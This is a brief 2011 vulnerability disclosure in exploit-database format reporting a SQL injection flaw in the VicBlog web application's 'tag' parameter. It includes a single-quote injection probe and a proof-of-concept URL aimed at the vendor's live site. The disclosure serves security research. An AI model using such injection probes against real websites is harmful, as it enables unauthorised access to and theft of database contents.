# Exploit Title: VicBlog SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Software Link: http://www.vicdesigns.com.au
# Version: All Version
# Tested on: All versions are Vulnerability

ISSUE

SQL Injection can be done using the command input

Vulnerable Page:
index.php

Example:
index.php?page=posts&tag=<SQL Injection Code>

Exploit:
index.php/1'

POC:
http://www.vicdesigns.com.au/vicblog/index.php?page=posts&tag=1%27


Thanks,


Eyup CELIK
Bilgi Teknolojileri Güvenlik Uzmani
http://www.eyupcelik.com.tr